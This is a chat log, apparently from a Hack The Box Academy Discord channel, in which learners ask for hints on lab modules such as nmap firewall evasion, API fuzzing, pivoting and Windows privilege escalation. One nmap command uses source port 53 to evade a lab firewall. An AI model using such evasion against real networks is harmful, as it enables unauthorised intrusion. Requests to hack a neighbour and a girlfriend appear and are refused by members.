Hi, I need help getting my crackmapexec to work 😦 even though impacket is installed, but it kept saying no module found

wicked apex
#

maybe install impacket via pip or pipx?

hexed lintel
#

accidentally closed the previous session, now giving The specified service already exist error
anyidea to fix this withoud resetting the lab

wicked apex
idle sigil
nova ocean
#

can anybody help??? Attacking Common Services - Skill Assessment Easy

idle sigil
steady charm
#

still better to use nxc, cme is not supported anymore. you are missing out on functionality

nova ocean
#

anybody solved Attacking Common Services ??

safe star
wicked apex
safe star
#

u should get a password too

wicked apex
#

yep. It was in somewhere else I wasn't expected

unique ether
#

Hard in assessments is really hard

#

I think I need a fresh mind

smoky marten
#

i’m evidently not using it

worn matrix
#

Can someone tell me why LSASS sometimes have cleartext creds and other times dont?

#

or if there a blog that explain this or something

cedar zinc
#

web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help

tardy mango
#

guys i need serious help someone please?????

#

y'all please reply someone if you can I'm very nervous rn

grand portal
#

what's the matter

tardy mango
#

IS THERE ANY WAY I CAN GET INSTAGRAM ACCOUNT BACK?

worn matrix
#

did you run a github .exe?

grand portal
#

take a deep breath

worn matrix
#

your mother?

tardy mango
#

I REALLY NEED HELP TO RECOVER THAT DAMN ACCOUNT

worn matrix
#

if you are undr 18 years old,don try hacking

tardy mango
#

I'M 19 FGSSS

grand portal
tardy mango
#

CAN SOMEONE HELP ME?

tardy mango
#

idk how to do hacking

#

I'm just a girl who doesn't know anything T_T

grand portal
#

your only hope is to remember the password. walk on grass or something, it helped me when i forgot the the password for my iphone-

tardy mango
#

it's like 7 years old account but it's public account it's embarrassing and I can't be on Instagram

unique ether
#

Enough discord for today what am I reading

tardy mango
#

my cousin found she'll tell my mom

marsh echo
cedar void
#

I am working on the Encrypted array section of the Secure coding 101 javascript module and I examining the following code function:

grand portal
tardy mango
#

@marsh echo ok hack my account thenπŸ₯²πŸ₯² then delete everything and have it I don't want it T_T

tardy mango
grand portal
#

an account as old of 7 years, i'd think one always did not rely on password. you must have reset it before, which is either by using oldpassword or number or email.

tardy mango
#

but i can prove that's my account

grand portal
tardy mango
cedar void
#

I am working on the Encrypted array section of the Secure coding 101 javascript module(https://academy.hackthebox.com/module/38/section/231) and I examining the following code function:
They claim in the following in this section:

"We see that this function is very ambiguous, as it is filled with references of the _0x54f1 function, and so it doesn't make much sense so far. So, let's take a closer look at the _0x54f1 function, by holding [CTRL] within VSCode, and clicking on any of its references within the sendCode function, which should take us right to it.

Its first two lines are the following:
Code: javascript

k = k - 0;
var value = _0x29f8[k];

As this function starts with referencing another function _0x29f8, let's first understand what _0x29f8 is. We can once again hold [CTRL] and click on it to jump to it."

When I open up that function iin VSCode editor and press 'CTRL' I can't find the Ox29f8 address or the two lines they are claiming are there

grand urchin
#

Can someone help me with the SQLMAP model

marsh echo
tardy mango
grand portal
tardy mango
worn matrix
#

sana sana...

marsh echo
#

learn academy htb

tardy mango
#

yea

grand portal
#

you need to calm down. and move on. @marsh echo is right.

tardy mango
#

what do i do now is there like no any other way?

cedar void
marsh echo
#

if you have a problem with your account try support πŸ™‚

tardy mango
#

i did i had on tiktok and Instagram the tiktok is very good it removed my account in week but instagram oh i just hate it

#

i just want one way I'll be very happy if i get help

acoustic owl
tardy mango
#

ohh

#

so there's no any other way!! T_T

wicked apex
#

if you are really into hacking as a career sign up for academy and go thru any modules you like

acoustic owl
worn matrix
marsh echo
tardy mango
worn matrix
#

lol

tardy mango
#

but i want it gone it's embarrassing

sinful olive
#

In Attacking Enterprise Networks I try to connect to the sites I found. In my kali it does not connect at all, but in the VM of HTB it does connect. How can I fix it? I really want to do this on my machine! thanks!big_think

tardy mango
#

aahh

marsh echo
wicked apex
wicked apex
#

sudo openvpn yourvpnfile

sinful olive
# worn matrix vpn

Yes of course... and its connecting.. I can ping the IP address they give. but cannot access the sites. (I also added them to /etc/hosts)

grand portal
#

think positively, maybe its good instagram is gone.

tardy mango
#

ya

forest minnow
#

Hi, I'm getting stuck on the NMAP module, hard lab (Firewall/IDS/IPS Evasion).

||I assumed, after the medium lab, that I still had to find how to get the DNS service version, just now it's harder obviously. After a few nmaps, I can confirm that the UDP 53 port is now closed, and DNS has switched to the TCP 53 port, which is filtered, but I just can't find a way to bypass the firewall. I tried decoy, -sA, -sS, source port 53, to no avail.

I tried to use a proxy in the target network, but enum only returns the target system as up. I also tried the "firewalk" and "firewall-bypass", but it didn't work.||

So now I'm out of options, tbh. If someone has a hint of any sort, maybe it would help.

sinful olive
grand portal
worn matrix
wicked apex
#

oh yeah you can only have either one
the pwnbox or the openvpn connection

grand portal
sinful olive
forest minnow
worn matrix
#

put many ip

grand portal
wary plover
forest minnow
grand portal
#

mine worked, without -g

#

by specifally mentioning ||--source-port 53 ||

forest minnow
#

For me, there is no difference

grand portal
forest minnow
#

I just did just in case, but still the same. I don't think the order of the options matters.

grand portal
forest minnow
#

||sudo nmap -n -Pn --disable-arp-ping --source-port 53 10.129.110.83 -p 53 -sV -sA --packet-trace||

wary plover
#

Nmap doesn't require your arguments to be in a specific order

#

You can do nmap -vvv 10.229.x.x -sC -oN output -sV and itll run

spark monolith
#

Hi guys new member here. I currently enroled to crack into htb path and im at service scanning and i have to nmap an ip so i can see what ports are open to answer some questions. The problem is this:
Nmap scan report for 10.129.223.49
Host is up (0.00051s latency).
All 1000 scanned ports on 10.129.223.49 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.23 seconds

grand portal
wicked apex
grand portal
forest minnow
#

In the medium lab, we're supposed to get the dns service version. The hard lab mentions that now, the service is better protected and that we need to get the version still. So I checked the UDP again, which is clearly close, so I switched to TCP. If it were close, I'd get a RST flag in response, but I don't get any response, so I assumed it was filtered by firewall, which we're supposed to get through

#

(I also tried port 5353 for good measure, but this one is closed)

grand portal
#

remember, the task itself, does not specify dns service, so be open to more than Dns.

forest minnow
#

The only open ports I found are ||SSH and HTTP||, which were too easy to get the version of, it can't be the answer πŸ˜…

grand portal
forest minnow
#

I supposed there was a way to get through the filter, but I guess it was a wrong idea, I'll check other options.

forest minnow
#

Meh. I triggered the IPS. I have to wait to try again.

grand portal
#

you can simply reset the target

forest minnow
#

Well, it's only 3 min

grand portal
#

well, reset is only 30 seconds

forest minnow
#

But the counter starts at 45/75, where waiting takes it down to 0

grand portal
#

alright

#

good, now delete it, and continue with the task.

#

Information gathering, Subdomain enumeration; Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com. im stuck at this.

shut vapor
spark monolith
#

maybe it is that i didnt connect to vpn?

shut vapor
#

It's registering the host as "up" so I wouldn't think VPN is the issue

spark monolith
#

I also saw a walkthough and he just run: nmap -sV <ip>

sinful olive
grand portal
spark monolith
shut vapor
shut vapor
icy marsh
#

#modules stuck in win privesc sedebugprivilege and setakeownershipprivilege. Can't get the required privileges . tried Enable-Privilege.ps1 and the othe one also tried Fullpowers.exe. none of them worked

icy marsh
icy marsh
# next bronze run as admin

do We have to manually enable a specific privilege for us from admin cmd prompt and then try to abuse that from non admin prompt ?

next bronze
#

no just use the admin prompt

icy marsh
next bronze
#

it's just a UAC thing

icy marsh
# next bronze it's just a UAC thing

oh !
my mistake. I forgot to check the local administrators group.
One thing , I am in local administrators group but can't do some administrative task for eg adding a user or change other user's pass. why sthis ?

daring nebula
#

hello guyes can you teach me hacking please i want to hack my neighbour because he dont let me play football outside and i also want to hack my girlfriend to see if she is cheating on me . because she keep telling me that i like potatoes but i dont and keep calling me baby but my name is dipratasta please help me iam very good nice personnnn

grand portal
fathom pendant
#

Also that would be illegal

daring nebula
wicked apex
#

wrong chat regardless
please visit #welcome

fathom pendant
#

Still illegal anyway skiddo

daring nebula
fathom pendant
#

We don't hack girlfriends here you knobhead

#

If you're that concerned ask

daring nebula
fathom pendant
#

I'm not mean dude

#

It's fuckin illegal what you're asking for

storm elk
#

@daring nebula you're not in the right place for this. Please do not ask for illegal things as mentioned by other members.

harsh gorge
daring nebula
storm elk
fathom pendant
#

Not against the rules to swear

daring nebula
harsh gorge
storm elk
fathom pendant
daring nebula
storm elk
daring nebula
fathom pendant
#

Cheating isn't illegal

daring nebula
fathom pendant
#

Immoral, sure. Illegal, no

daring nebula
fathom pendant
#

Just seeing how creative the troll is

harsh gorge
vernal hedge
daring nebula
fathom pendant
daring nebula
vernal hedge
fathom pendant
#

Either way

storm elk
#

We don't want that. It's a you-problem @daring nebula , this is about Hack The Box and not about hacking your neighbour/girlfriend

daring nebula
#

can you teach me hacking now for protection . i dont think this guyes like me and i think they are planning to destroy my computer

grand portal
grand portal
daring nebula
storm elk
vernal hedge
#

Nobody is gonna hack you lol

daring nebula
grand portal
#

back in old days, trolls like such was immediately kicked off by moderators on amino platform.

daring nebula
harsh gorge
storm elk
fathom pendant
#

No

compact patrolBOT
fathom pendant
#

There are some free modules on htb academy

vernal hedge
#

But your gonna need the cubes to get the real spicy stuff

storm elk
#

lol @ spicy stuff

fathom pendant
#

But mostly everything you learn in academy can be found somewhere else on the internet for free (at a lower quality)

daring nebula
harsh gorge
grand portal
storm elk
fathom pendant
grand portal
#

let's not forget, that is how basically we were curios to learn to hack. not necessarily hacking gf though, lol

storm elk
#

not me

wicked apex
#

yeah

grand portal
#

the condition, requires having gf. rip me

fathom pendant
vernal hedge
#

You lost me at the requirement of having a gf

#

Hacking takes time though, and I’ve seen tons of people quit because it can be too much, by the time he could learn how to hack his neighbors would have moved out lol

grand portal
#

by the time one learns hacking, having girlfriend is a liability, as for time.

vernal hedge
grand portal
harsh gorge
vernal hedge
#

β€œBut honey I need to solve this seasonal box I’ve been working on for 27 hours” 😭

grand portal
#

"your honor, plantiff spends more time with his pc than his wife"

vernal hedge
storm elk
#

cough keep it #module related cough

harsh gorge
#

Oh I guess I could use some help with an academy module

vernal hedge
#

Uh so modules

harsh gorge
#

For one pivoting using proxy chains is kinda confusing

grand portal
#

i could go on with your honor comments, but lets not make it irrelevant chat.

harsh gorge
#

How does it work under the hood?

wicked apex
grand portal
fathom pendant
#

Or to the next hop in the chain

storm elk
fathom pendant
#

Yes

#

Pivoting is just using a port forward to access another machine internally

#

Can be a higher/lower/same privilege machine that you pivot to

harsh gorge
fathom pendant
#

Yep

#

Because by the same token that sends traffic back to you, you can also use that access point to scan/access other points in the network

#

You're creating your own network tunnel

harsh gorge
#

I see thank you.

#

On that note, what would be a good practice machine for CPTS? I kinda am coming back from a long hiatus.

fathom pendant
#

Just spin up and get DA

#

No reading questions or sections

harsh gorge
#

Let’s get it, I guess.

fathom pendant
#

Anything you struggle on is what modules you should revisit

cedar zinc
#

web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help

harsh gorge
fathom pendant
#

The response from curl is what the answer is

fathom pendant
harsh gorge
#

An API, is an application programming interface. You make a request to an API and it runs some code in an application and returns a result

shut vapor
#

@spark monolith Figure this out; what are the module and section titles?

harsh gorge
#

By fuzzing an API, you attempt to try to find out hidden or otherwise unknown info to you, the attacker, by trying out random words or phrases

fathom pendant
#

When you curl it you'll get json output that's
{"flag":"value"}

harsh gorge
#

This is of course different from directory brute forcing as you are trying to retrieve a directory by using a wordlist

fathom pendant
fathom pendant
#

Which the module provides a tool link for

cedar zinc
fathom pendant
#

Are you using the api fuzzer the module linked?

cedar zinc
#

I tried it already... Its showing this error

#

I tried "python3" its showing same error

daring nebula
#

guyes what is ip ddress

spark monolith